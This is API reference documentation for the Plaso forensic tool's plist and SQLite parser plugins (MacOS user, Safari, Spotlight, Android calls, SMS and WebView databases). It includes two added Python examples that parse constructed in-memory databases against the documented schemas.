Program: absolute path to the executable. required in the absence of the ProgramArguments key. ProgramArguments: command-line flags for the executable. required in the absence of the Program key. UserName: the job run as the specified user. GroupName: the job run as the specified group. DATA_FORMAT = 'Launchd plist file' NAME = 'launchd_plist' PLIST_KEYS = frozenset({'GroupName', 'Label', 'Program', 'ProgramArguments', 'UserName'}) plaso.parsers.plist_plugins.macuser module

Plist parser plugin for MacOS user plist files. class plaso.parsers.plist_plugins.macuser.MacUserPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for MacOS user plist files. Further details about the extracted fields. name: string with the system user. uid: user ID. passwordpolicyoptions: XML Plist structures with the timestamp. passwordLastSetTime: last time the password was changed. lastLoginTimestamp: last time the user was authenticated depending on the situation, these timestamps are reset (0 value). It is translated by the library as a 2001-01-01 00:00:00 (Cocoa zero time representation). If this happens, the event is not yield. failedLoginTimestamp: last time the user passwd was incorrectly(*). failedLoginCount: times of incorrect passwords. DATA_FORMAT = 'MacOS user plist file' NAME = 'macuser' PLIST_KEYS = frozenset({'ShadowHashData', 'home', 'name', 'passwordpolicyoptions', 'uid'})

plaso.parsers.plist_plugins.safari module

Plist parser plugin for Safari history plist files. class plaso.parsers.plist_plugins.safari.SafariHistoryEventData Bases: plaso.containers.events.EventData Safari history event data. display_title display title of the webpage visited. Type str


title title of the webpage visited. Type str url URL visited. Type str visit_count number of times the website was visited. Type int was_http_non_get True if the webpage was visited using a non-GET HTTP request. Type bool DATA_TYPE = 'safari:history:visit' class plaso.parsers.plist_plugins.safari.SafariHistoryPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Safari history plist files. DATA_FORMAT = 'Safari history plist file' NAME = 'safari_history' PLIST_KEYS = frozenset({'WebHistoryDates', 'WebHistoryFileVersion'}) PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.softwareupdate module

Plist parser plugin for MacOS software update plist files. class plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for MacOS software update plist files. Further details about the extracted fields: LastFullSuccessfulDate: timestamp when MacOS was full update. LastSuccessfulDate: timestamp when MacOS was partially update. DATA_FORMAT = 'MacOS software update plist file' NAME = 'macos_software_update' PLIST_KEYS = frozenset({'LastAttemptSystemVersion', 'LastFullSuccessfulDate', 'LastRecommendedUpdatesAvailable', 'LastSuccessfulDate', 'LastUpdatesAvailable', 'RecommendedUpdates'}) PLIST_PATH_FILTERS = frozenset({})


plaso.parsers.plist_plugins.spotlight module

Plist parser plugin for Spotlight searched terms plist files. class plaso.parsers.plist_plugins.spotlight.SpotlightPlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Spotlight searched terms plist files. Further information about extracted fields: name of the item: search term. PATH: path of the program associated to the term. LAST_USED: last time when it was executed. DISPLAY_NAME: the display name of the program associated. DATA_FORMAT = 'Spotlight plist file' NAME = 'spotlight' PLIST_KEYS = frozenset({'UserShortcuts'}) PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.spotlight_volume module

Plist parser plugin for Spotlight volume configuration plist files. class plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin Plist parser plugin for Spotlight volume configuration plist files. DATA_FORMAT = 'Spotlight volume configuration plist file' NAME = 'spotlight_volume' PLIST_KEYS = frozenset({'Stores'}) PLIST_PATH_FILTERS = frozenset({}) plaso.parsers.plist_plugins.timemachine module

Plist parser plugin for TimeMachine plist files. class plaso.parsers.plist_plugins.timemachine.TimeMachinePlugin Bases: plaso.parsers.plist_plugins.interface.PlistPlugin, plaso.lib.dtfabric_helper.DtFabricHelper Plist parser plugin for TimeMachine plist files. Further details about the extracted fields: DestinationID: remote UUID hard disk where the backup is done. BackupAlias: structure that contains the extra information from the destinationID. SnapshotDates: list of the backup dates.


DATA_FORMAT = 'TimeMachine plist file' NAME = 'time_machine' PLIST_KEYS = frozenset({'Destinations', 'RootVolumeUUID'}) PLIST_PATH_FILTERS = frozenset({})

Module contents

Imports for the plist parser plugins.

plaso.parsers.shared package

Submodules

plaso.parsers.shared.shell_items module

Parser for Windows NT shell items. class plaso.parsers.shared.shell_items.ShellItemsParser(origin) Bases: object Parses for Windows NT shell items. CopyToPath() Copies the shell items to a path. Returns converted shell item list path or None. Return type str GetUpperPathSegment() Retrieves the upper shell item path segment. Returns shell item path segment or “N/A”. Return type str NAME = 'shell_items' ParseByteStream(parser_mediator, byte_stream, parent_path_segments=None, codepage='cp1252') Parses the shell items from the byte stream. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • byte_stream (bytes) – shell items data. • parent_path_segments (Optional[list[str]]) – parent shell item path segments. • codepage (Optional[str]) – byte stream codepage.


Module contents

plaso.parsers.sqlite_plugins package

Submodules

plaso.parsers.sqlite_plugins.android_calls module

SQLite parser plugin for Android call history database files. class plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventData Bases: plaso.containers.events.EventData Android Call event data. call_type type of call, such as: Incoming, Outgoing, or Missed. Type str duration number of seconds the call lasted. Type int name name associated to the remote party. Type str number phone number associated to the remote party. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str DATA_TYPE = 'android:event:call' class plaso.parsers.sqlite_plugins.android_calls.AndroidCallPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Android call history database files. The Android call history database file is typically stored in: contacts2.db CALL_TYPE = {1: 'INCOMING', 2: 'OUTGOING', 3: 'MISSED'} DATA_FORMAT = 'Android call history SQLite database (contacts2.db) file' NAME = 'android_calls' ParseCallsRow(parser_mediator, query, row, **unused_kwargs) Parses a Call record row. Parameters


• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT _id AS id, date, number, name, duration, type FROM calls', 'ParseCallsRow')] REQUIRED_STRUCTURE = {'calls': frozenset({'_id', 'date', 'duration', 'name', 'number', 'type'})}
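As an added example (not Plaso's own code), the script below mimics how a SQLite parser plugin such as AndroidCallPlugin uses its REQUIRED_STRUCTURE, QUERIES and CALL_TYPE: it builds an in-memory database from the calls table schema listed on this page with constructed rows, checks that every required column is present before running any query, and converts each row into the AndroidCallEventData fields. The helper names (GetDatabaseStructure, CheckRequiredStructure, ParseDatabase, BuildSampleDatabase), the 'UNKNOWN' fallback for unlisted call types and the simplified date handling are assumptions of this example.

```python
"""Added example, not Plaso's own code: shows how a SQLite parser plugin like
AndroidCallPlugin matches a database against REQUIRED_STRUCTURE and then
turns QUERIES rows into AndroidCallEventData-like records.
Helper names and the event dict layout are assumptions of this example."""
import sqlite3

# CREATE TABLE statement copied from the calls entry in the page's SCHEMAS.
CALLS_SCHEMA = (
    'CREATE TABLE calls (_id INTEGER PRIMARY KEY AUTOINCREMENT, number TEXT, '
    'date INTEGER, duration INTEGER, type INTEGER, new INTEGER, name TEXT, '
    'numbertype INTEGER, numberlabel TEXT, countryiso TEXT, '
    'voicemail_uri TEXT, is_read INTEGER, geocoded_location TEXT, '
    'lookup_uri TEXT, matched_number TEXT, normalized_number TEXT, '
    'photo_id INTEGER NOT NULL DEFAULT 0, formatted_number TEXT, _data TEXT, '
    'has_content INTEGER, mime_type TEXT, source_data TEXT, '
    'source_package TEXT, state INTEGER)')

# Plugin attributes exactly as listed on the page for AndroidCallPlugin.
CALL_TYPE = {1: 'INCOMING', 2: 'OUTGOING', 3: 'MISSED'}
QUERIES = [
    ('SELECT _id AS id, date, number, name, duration, type FROM calls',
     'ParseCallsRow')]
REQUIRED_STRUCTURE = {
    'calls': frozenset({'_id', 'date', 'duration', 'name', 'number', 'type'})}


def GetDatabaseStructure(connection):
    """Maps each table in the database to the frozenset of its column names."""
    structure = {}
    cursor = connection.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")
    for (table_name,) in cursor.fetchall():
        # PRAGMA table_info rows are (cid, name, type, notnull, dflt, pk).
        columns = connection.execute(
            'PRAGMA table_info("{0:s}")'.format(table_name)).fetchall()
        structure[table_name] = frozenset(column[1] for column in columns)
    return structure


def CheckRequiredStructure(structure, required_structure):
    """Returns True only if every required table has every required column.

    Extra tables or columns are fine; the check is a subset test per table."""
    for table_name, required_columns in required_structure.items():
        columns = structure.get(table_name)
        if columns is None or not required_columns.issubset(columns):
            return False
    return True


def ParseCallsRow(query, row):
    """Converts one calls row into the AndroidCallEventData fields."""
    return {
        # CALL_TYPE maps the integer type column to a label; values outside
        # the mapping are reported as 'UNKNOWN' (assumption of this example).
        'call_type': CALL_TYPE.get(row['type'], 'UNKNOWN'),
        'duration': row['duration'],
        'name': row['name'],
        'number': row['number'],
        'offset': str(row['id']),  # row identifier, kept as str as on the page
        'query': query,
        # Android stores the call date as milliseconds since the Unix epoch;
        # a real plugin wraps it in a dfdatetime value (simplified here).
        'date_milliseconds': row['date'],
    }


def ParseDatabase(connection):
    """Runs the plugin queries if the structure matches, else returns None.

    A structure mismatch is the normal "not my database" outcome: the plugin
    declines instead of raising so other SQLite plugins can still be tried."""
    if not CheckRequiredStructure(
            GetDatabaseStructure(connection), REQUIRED_STRUCTURE):
        return None
    connection.row_factory = sqlite3.Row  # rows become addressable by column
    callbacks = {'ParseCallsRow': ParseCallsRow}
    events = []
    for query, callback_name in QUERIES:
        for row in connection.execute(query):
            events.append(callbacks[callback_name](query, row))
    return events


def BuildSampleDatabase():
    """Builds an in-memory contacts2.db look-alike with constructed rows."""
    connection = sqlite3.connect(':memory:')
    connection.execute(CALLS_SCHEMA)
    connection.executemany(
        'INSERT INTO calls (number, date, duration, type, name) '
        'VALUES (?, ?, ?, ?, ?)',
        [('+15555550100', 1623000000000, 42, 1, 'Alice'),  # constructed
         ('+15555550101', 1623000600000, 0, 3, None),      # constructed
         ('+15555550102', 1623001200000, 7, 9, 'Bob')])    # unlisted type
    connection.commit()
    return connection


if __name__ == '__main__':
    for event in ParseDatabase(BuildSampleDatabase()):
        print(event)
```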


SCHEMAS = [{'_sync_state': 'CREATE TABLE _sync_state (_id INTEGER PRIMARY KEY, account_name TEXT NOT NULL, account_type TEXT NOT NULL, data TEXT, UNIQUE(account_name, account_type))', '_sync_state_metadata': 'CREATE TABLE _sync_state_metadata (version INTEGER)', 'accounts': 'CREATE TABLE accounts (_id INTEGER PRIMARY KEY AUTOINCREMENT, account_name TEXT, account_type TEXT, data_set TEXT)', 'agg_exceptions': 'CREATE TABLE agg_exceptions (_id INTEGER PRIMARY KEY AUTOINCREMENT, type INTEGER NOT NULL, raw_contact_id1 INTEGER REFERENCES raw_contacts(_id), raw_contact_id2 INTEGER REFERENCES raw_contacts(_id))', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'calls': 'CREATE TABLE calls (_id INTEGER PRIMARY KEY AUTOINCREMENT, number TEXT, date INTEGER, duration INTEGER, type INTEGER, new INTEGER, name TEXT, numbertype INTEGER, numberlabel TEXT, countryiso TEXT, voicemail_uri TEXT, is_read INTEGER, geocoded_location TEXT, lookup_uri TEXT, matched_number TEXT, normalized_number TEXT, photo_id INTEGER NOT NULL DEFAULT 0, formatted_number TEXT, _data TEXT, has_content INTEGER, mime_type TEXT, source_data TEXT, source_package TEXT, state INTEGER)', 'contacts': 'CREATE TABLE contacts (_id INTEGER PRIMARY KEY AUTOINCREMENT, name_raw_contact_id INTEGER REFERENCES raw_contacts(_id), photo_id INTEGER REFERENCES data(_id), photo_file_id INTEGER REFERENCES photo_files(_id), custom_ringtone TEXT, send_to_voicemail INTEGER NOT NULL DEFAULT 0, times_contacted INTEGER NOT NULL DEFAULT 0, last_time_contacted INTEGER, starred INTEGER NOT NULL DEFAULT 0, has_phone_number INTEGER NOT NULL DEFAULT 0, lookup TEXT, status_update_id INTEGER REFERENCES data(_id), contact_last_updated_timestamp INTEGER)', 'data': 'CREATE TABLE data (_id INTEGER PRIMARY KEY AUTOINCREMENT, package_id INTEGER REFERENCES package(_id), mimetype_id INTEGER REFERENCES mimetype(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, is_read_only INTEGER NOT NULL DEFAULT 0, 
is_primary INTEGER NOT NULL DEFAULT 0, is_super_primary INTEGER NOT NULL DEFAULT 0, data_version INTEGER NOT NULL DEFAULT 0, data1 TEXT, data2 TEXT, data3 TEXT, data4 TEXT, data5 TEXT, data6 TEXT, data7 TEXT, data8 TEXT, data9 TEXT, data10 TEXT, data11 TEXT, data12 TEXT, data13 TEXT, data14 TEXT, data15 TEXT, data_sync1 TEXT, data_sync2 TEXT, data_sync3 TEXT, data_sync4 TEXT )', 'data_usage_stat': 'CREATE TABLE data_usage_stat(stat_id INTEGER PRIMARY KEY AUTOINCREMENT, data_id INTEGER NOT NULL, usage_type INTEGER NOT NULL DEFAULT 0, times_used INTEGER NOT NULL DEFAULT 0, last_time_used INTEGER NOT NULL DEFAULT 0, FOREIGN KEY(data_id) REFERENCES data(_id))', 'default_directory': 'CREATE TABLE default_directory (_id INTEGER PRIMARY KEY)', 'deleted_contacts': 'CREATE TABLE deleted_contacts (contact_id INTEGER PRIMARY KEY, contact_deleted_timestamp INTEGER NOT NULL default 0)', 'directories': 'CREATE TABLE directories(_id INTEGER PRIMARY KEY AUTOINCREMENT, packageName TEXT NOT NULL, authority TEXT NOT NULL, typeResourceId INTEGER, typeResourceName TEXT, accountType TEXT, accountName TEXT, displayName TEXT, exportSupport INTEGER NOT NULL DEFAULT 0, shortcutSupport INTEGER NOT NULL DEFAULT 0, photoSupport INTEGER NOT NULL DEFAULT 0)', 'groups': 'CREATE TABLE groups (_id INTEGER PRIMARY KEY AUTOINCREMENT, package_id INTEGER REFERENCES package(_id), account_name STRING DEFAULT NULL, account_type STRING DEFAULT NULL, data_set STRING DEFAULT NULL, sourceid TEXT, version INTEGER NOT NULL DEFAULT 1, dirty INTEGER NOT NULL DEFAULT 0, title TEXT, title_res INTEGER, notes TEXT, system_id TEXT, deleted INTEGER NOT NULL DEFAULT 0, group_visible INTEGER NOT NULL DEFAULT 0, should_sync INTEGER NOT NULL DEFAULT 1, auto_add INTEGER NOT NULL DEFAULT 0, favorites INTEGER NOT NULL DEFAULT 0, group_is_read_only INTEGER NOT NULL DEFAULT 0, sync1 TEXT, sync2 TEXT, sync3 TEXT, sync4 TEXT , account_id INTEGER REFERENCES accounts(_id))', 'mimetypes': 'CREATE TABLE mimetypes (_id INTEGER PRIMARY 
KEY AUTOINCREMENT, mimetype TEXT NOT NULL)', 'name_lookup': 'CREATE TABLE name_lookup (data_id INTEGER REFERENCES data(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, normalized_name TEXT NOT NULL, name_type INTEGER NOT NULL, PRIMARY KEY (data_id, normalized_name, name_type))', 'nickname_lookup': 'CREATE TABLE nickname_lookup (name TEXT, cluster TEXT)', 'packages': 'CREATE TABLE packages (_id INTEGER PRIMARY KEY AUTOINCREMENT, package TEXT NOT NULL)', 'phone_lookup': 'CREATE TABLE phone_lookup (data_id INTEGER REFERENCES data(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, normalized_number TEXT NOT NULL, min_match TEXT NOT NULL)', 'photo_files': 'CREATE TABLE photo_files (_id INTEGER PRIMARY KEY AUTOINCREMENT, height INTEGER NOT NULL, width INTEGER NOT NULL, filesize INTEGER NOT NULL)', 'properties': 'CREATE TABLE properties (property_key TEXT PRIMARY KEY, property_value TEXT )'}]

plaso.parsers.sqlite_plugins.android_sms module

SQLite parser plugin for Android text messages (SMS) database files.

class plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventData
    Bases: plaso.containers.events.EventData
    Android SMS event data.
        address (str): phone number associated to the sender or receiver.
        body (str): content of the SMS text message.
        offset (str): identifier of the row, from which the event data was extracted.
        query (str): SQL query that was used to obtain the event data.
        sms_read (str): message read status, either Read or Unread.
        sms_type (str): message type, either Sent or Received.
    DATA_TYPE = 'android:messaging:sms'

class plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Android text messages (SMS) database files.
    The Android text messages (SMS) database file is typically stored in: mmssms.dbs
    DATA_FORMAT = 'Android text messages (SMS) SQLite database (mmssms.dbs) file'
    NAME = 'android_sms'
    ParseSmsRow(parser_mediator, query, row, **unused_kwargs)
        Parses an SMS row.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
    QUERIES = [('SELECT _id AS id, address, date, read, type, body FROM sms', 'ParseSmsRow')]
    REQUIRED_STRUCTURE = {'sms': frozenset({'_id', 'address', 'body', 'date', 'read', 'type'})}
    SCHEMAS = [{'addr': 'CREATE TABLE addr (_id INTEGER PRIMARY KEY, msg_id INTEGER, contact_id INTEGER, address TEXT, type INTEGER, charset INTEGER)', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'attachments': 'CREATE TABLE attachments (sms_id INTEGER, content_url TEXT, offset INTEGER)', 'canonical_addresses': 'CREATE TABLE canonical_addresses (_id INTEGER PRIMARY KEY AUTOINCREMENT, address TEXT)', 'drm': 'CREATE TABLE drm (_id INTEGER PRIMARY KEY, _data TEXT)', 'part': 'CREATE TABLE part (_id INTEGER PRIMARY KEY AUTOINCREMENT, mid INTEGER, seq INTEGER DEFAULT 0, ct TEXT, name TEXT, chset INTEGER, cd TEXT, fn TEXT, cid TEXT, cl TEXT, ctt_s INTEGER, ctt_t TEXT, _data TEXT, text TEXT)', 'pd': 'CREATE TABLE pdu (_id INTEGER PRIMARY KEY AUTOINCREMENT, thread_id INTEGER, date INTEGER, date_sent INTEGER DEFAULT 0, msg_box INTEGER, read INTEGER DEFAULT 0, m_id TEXT, sub TEXT, sub_cs INTEGER, ct_t TEXT, ct_l TEXT, exp INTEGER, m_cls TEXT, m_type INTEGER, v INTEGER, m_size INTEGER, pri INTEGER, rr INTEGER, rpt_a INTEGER, resp_st INTEGER, st INTEGER, tr_id TEXT, retr_st INTEGER, retr_txt TEXT, retr_txt_cs INTEGER, read_status INTEGER, ct_cls INTEGER, resp_txt TEXT, d_tm INTEGER, d_rpt INTEGER, locked INTEGER DEFAULT 0, seen INTEGER DEFAULT 0, text_only INTEGER DEFAULT 0)', 'pending_msgs': 'CREATE TABLE pending_msgs (_id INTEGER PRIMARY KEY, proto_type INTEGER, msg_id INTEGER, msg_type INTEGER, err_type INTEGER, err_code INTEGER, retry_index INTEGER NOT NULL DEFAULT 0, due_time INTEGER, last_try INTEGER)', 'rate': 'CREATE TABLE rate (sent_time INTEGER)', 'raw': 'CREATE TABLE raw (_id INTEGER PRIMARY KEY, date INTEGER, reference_number INTEGER, count INTEGER, sequence INTEGER, destination_port INTEGER, address TEXT, pdu TEXT)', 'sms': 'CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, address TEXT, person INTEGER, date INTEGER, date_sent INTEGER DEFAULT 0, protocol INTEGER, read INTEGER DEFAULT 0, status INTEGER DEFAULT -1, type INTEGER, reply_path_present INTEGER, subject TEXT, body TEXT, service_center TEXT, locked INTEGER DEFAULT 0, error_code INTEGER DEFAULT 0, seen INTEGER DEFAULT 0)', 'sr_pending': 'CREATE TABLE sr_pending (reference_number INTEGER, action TEXT, data TEXT)', 'threads': 'CREATE TABLE threads (_id INTEGER PRIMARY KEY AUTOINCREMENT, date INTEGER DEFAULT 0, message_count INTEGER DEFAULT 0, recipient_ids TEXT, snippet TEXT, snippet_cs INTEGER DEFAULT 0, read INTEGER DEFAULT 1, type INTEGER DEFAULT 0, error INTEGER DEFAULT 0, has_attachment INTEGER DEFAULT 0)', 'words': 'CREATE VIRTUAL TABLE words USING FTS3 (_id INTEGER PRIMARY KEY, index_text TEXT, source_id INTEGER, table_to_use INTEGER)', 'words_content': "CREATE TABLE 'words_content'(docid INTEGER PRIMARY KEY, 'c0_id', 'c1index_text', 'c2source_id', 'c3table_to_use')", 'words_segdir': "CREATE TABLE 'words_segdir'(level INTEGER, idx INTEGER, start_block INTEGER, leaves_end_block INTEGER, end_block INTEGER, root BLOB, PRIMARY KEY(level, idx))", 'words_segments': "CREATE TABLE 'words_segments'(blockid INTEGER PRIMARY KEY, block BLOB)"}]
    SMS_READ = {0: 'UNREAD', 1: 'READ'}
    SMS_TYPE = {1: 'RECEIVED', 2: 'SENT'}
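The following is an added, stand-alone example (not Plaso's own code) that replays what the android_sms plugin does: it builds an in-memory database from the plugin's own `sms` CREATE TABLE statement, applies the REQUIRED_STRUCTURE table/column check that decides whether the plugin applies, runs the plugin's QUERIES statement and translates `read` and `type` through SMS_READ and SMS_TYPE. The `date` column is treated as milliseconds since 1970 and unknown codes become `'UNKNOWN'`; both are assumptions of this example, and the sample rows are constructed.

```python
"""Added example (not plaso's own code): replay the android_sms plugin's
structure check and row parsing against a constructed database."""
import datetime
import sqlite3

# Values copied from the AndroidSMSPlugin reference above.
QUERY = 'SELECT _id AS id, address, date, read, type, body FROM sms'
REQUIRED_STRUCTURE = {
    'sms': frozenset({'_id', 'address', 'body', 'date', 'read', 'type'})}
SMS_READ = {0: 'UNREAD', 1: 'READ'}
SMS_TYPE = {1: 'RECEIVED', 2: 'SENT'}

# The 'sms' CREATE TABLE statement from the plugin's SCHEMAS list.
SMS_SCHEMA = (
    'CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, '
    'address TEXT, person INTEGER, date INTEGER, date_sent INTEGER DEFAULT 0, '
    'protocol INTEGER, read INTEGER DEFAULT 0, status INTEGER DEFAULT -1, '
    'type INTEGER, reply_path_present INTEGER, subject TEXT, body TEXT, '
    'service_center TEXT, locked INTEGER DEFAULT 0, error_code INTEGER '
    'DEFAULT 0, seen INTEGER DEFAULT 0)')

# Constructed sample rows: (_id, address, date, read, type, body).
# 'date' is assumed to be milliseconds since 1970-01-01 (Java time).
SAMPLE_ROWS = [
    (1, '+15555550100', 1623000000000, 1, 1, 'hi'),
    (2, '+15555550100', 1623000060000, 1, 2, 'hello back'),
    (3, '+15555550199', 1623000120000, 0, 3, 'draft?'),  # 3 not in SMS_TYPE
]


def build_sample_database(schema=SMS_SCHEMA, rows=SAMPLE_ROWS):
    """Create an in-memory database shaped like the plugin's schema."""
    connection = sqlite3.connect(':memory:')
    connection.row_factory = sqlite3.Row
    connection.execute(schema)
    if rows:
        connection.executemany(
            'INSERT INTO sms (_id, address, date, read, type, body) '
            'VALUES (?, ?, ?, ?, ?, ?)', rows)
    connection.commit()
    return connection


def has_required_structure(connection, required_structure=REQUIRED_STRUCTURE):
    """Mirror the REQUIRED_STRUCTURE check: every listed table must exist and
    carry every listed column, otherwise the plugin does not apply."""
    for table_name, columns in required_structure.items():
        # pragma_table_info is SQLite's table-valued form of PRAGMA table_info.
        present = {row['name'] for row in connection.execute(
            'SELECT name FROM pragma_table_info(?)', (table_name,))}
        if not present or not columns.issubset(present):
            return False
    return True


def parse_sms_rows(connection):
    """Run the plugin's QUERIES statement and build one event-data dict per
    row, the way ParseSmsRow fills AndroidSMSEventData. Codes missing from
    SMS_READ/SMS_TYPE are reported as 'UNKNOWN' (an assumption here)."""
    events = []
    for row in connection.execute(QUERY):
        timestamp = datetime.datetime.fromtimestamp(
            row['date'] / 1000.0, tz=datetime.timezone.utc)
        events.append({
            'data_type': 'android:messaging:sms',
            'timestamp': timestamp.isoformat(),
            'offset': row['id'],
            'address': row['address'],
            'body': row['body'],
            'sms_read': SMS_READ.get(row['read'], 'UNKNOWN'),
            'sms_type': SMS_TYPE.get(row['type'], 'UNKNOWN'),
            'query': QUERY,
        })
    return events


if __name__ == '__main__':
    database = build_sample_database()
    if has_required_structure(database):
        for event in parse_sms_rows(database):
            print(event['timestamp'], event['sms_type'], event['sms_read'],
                  event['address'], event['body'])
```

A database whose `sms` table lacks any of the six required columns fails `has_required_structure` and would not be handled by the plugin, which is the same reason Plaso silently skips files with an unexpected schema.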

plaso.parsers.sqlite_plugins.android_webview module

SQLite parser plugin for Android WebView database files.

class plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventData
    Bases: plaso.containers.events.EventData
    Android WebView cookie event data.
        cookie_name (str): name of the cookie.
        data (str): data stored in the cookie.
        host (str): host that set the cookie.
        offset (str): identifier of the row, from which the event data was extracted.
        path (str): path for which the cookie was set.
        query (str): SQL query that was used to obtain the event data.
        secure (bool): True if the cookie should only be transmitted over a secure channel.
        url (str): URL of the cookie.
    DATA_TYPE = 'webview:cookie'

class plaso.parsers.sqlite_plugins.android_webview.WebViewPlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Android WebView database files.
    DATA_FORMAT = 'Android WebView SQLite database file'
    NAME = 'android_webview'
    ParseCookieRow(parser_mediator, query, row, **unused_kwargs)
        Parses a row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
    QUERIES = frozenset({('SELECT _id, name, value, domain, expires, path, secure FROM cookies', 'ParseCookieRow')})
    REQUIRED_STRUCTURE = {'android_metadata': frozenset({}), 'cookies': frozenset({'_id', 'domain', 'expires', 'name', 'path', 'secure', 'value'})}
    SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'cookies': 'CREATE TABLE cookies (_id INTEGER PRIMARY KEY, name TEXT, value TEXT, domain TEXT, path TEXT, expires INTEGER, secure INTEGER)', 'formdata': 'CREATE TABLE formdata (_id INTEGER PRIMARY KEY, urlid INTEGER, name TEXT, value TEXT, UNIQUE (urlid, name, value) ON CONFLICT IGNORE)', 'formurl': 'CREATE TABLE formurl (_id INTEGER PRIMARY KEY, url TEXT)', 'httpauth': 'CREATE TABLE httpauth (_id INTEGER PRIMARY KEY, host TEXT, realm TEXT, username TEXT, password TEXT, UNIQUE (host, realm) ON CONFLICT REPLACE)', 'password': 'CREATE TABLE password (_id INTEGER PRIMARY KEY, host TEXT, username TEXT, password TEXT, UNIQUE (host, username) ON CONFLICT REPLACE)'}]

plaso.parsers.sqlite_plugins.android_webviewcache module

SQLite parser plugin for Android WebviewCache database files.

class plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCacheEventData
    Bases: plaso.containers.events.EventData
    Android WebViewCache event data.
        content_length (int): size of the cached content.
        query (str): SQL query that was used to obtain the event data.
        url (str): URL the content was retrieved from.
    DATA_TYPE = 'android:webviewcache'

class plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for Android WebviewCache database files.
    DATA_FORMAT = 'Android WebViewCache SQLite database file'
    NAME = 'android_webviewcache'
    ParseRow(parser_mediator, query, row, **unused_kwargs)
        Parses a row from the database.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
    QUERIES = frozenset({('SELECT url, contentlength, expires, lastmodify FROM cache', 'ParseRow')})
    REQUIRED_STRUCTURE = {'android_metadata': frozenset({}), 'cache': frozenset({'contentlength', 'expires', 'lastmodify', 'url'})}
    SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'cache': 'CREATE TABLE cache (_id INTEGER PRIMARY KEY, url TEXT, filepath TEXT, lastmodify TEXT, etag TEXT, expires INTEGER, expiresstring TEXT, mimetype TEXT, encoding TEXT, httpstatus INTEGER, location TEXT, contentlength INTEGER, contentdisposition TEXT, UNIQUE (url) ON CONFLICT REPLACE)'}]

plaso.parsers.sqlite_plugins.appusage module

SQLite parser plugin for MacOS application usage database files.

class plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePlugin
    Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
    SQLite parser plugin for MacOS application usage database files.
    The MacOS application usage database is typically stored in: /var/db/application_usage.sqlite
    Application usage is a SQLite database that records entries triggered by the NSWorkspaceWillLaunchApplicationNotification and NSWorkspaceDidTerminateApplicationNotification NSWorkspace notifications, written by crankd. More information can be found here: https://github.com/google/macops/blob/master/crankd/ApplicationUsage.py
    DATA_FORMAT = 'MacOS application usage SQLite database (application_usage.sqlite) file'
    NAME = 'appusage'
    ParseApplicationUsageRow(parser_mediator, query, row, **unused_kwargs)
        Parses an application usage row.
        Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
    QUERIES = [('SELECT last_time, event, bundle_id, app_version, app_path, number_times FROM application_usage ORDER BY last_time', 'ParseApplicationUsageRow')]
    REQUIRED_STRUCTURE = {'application_usage': frozenset({'app_path', 'app_version', 'bundle_id', 'event', 'last_time', 'number_times'})}
    SCHEMAS = [{'application_usage': 'CREATE TABLE application_usage (event TEXT, bundle_id TEXT, app_version TEXT, app_path TEXT, last_time INTEGER DEFAULT 0, number_times INTEGER DEFAULT 0, PRIMARY KEY (event, bundle_id))'}]

class plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData
    Bases: plaso.containers.events.EventData
    MacOS application usage event data.
        application (str): name of the application.
        app_version (str): version of the application.
        bundle_id (str): bundle identifier of the application.
        count (int): TODO: number of times what?
        query (str): SQL query that was used to obtain the event data.
    DATA_TYPE = 'macosx:application_usage'

plaso.parsers.sqlite_plugins.chrome_autofill module

SQLite parser plugin for Google Chrome autofill database (Web Data) files.

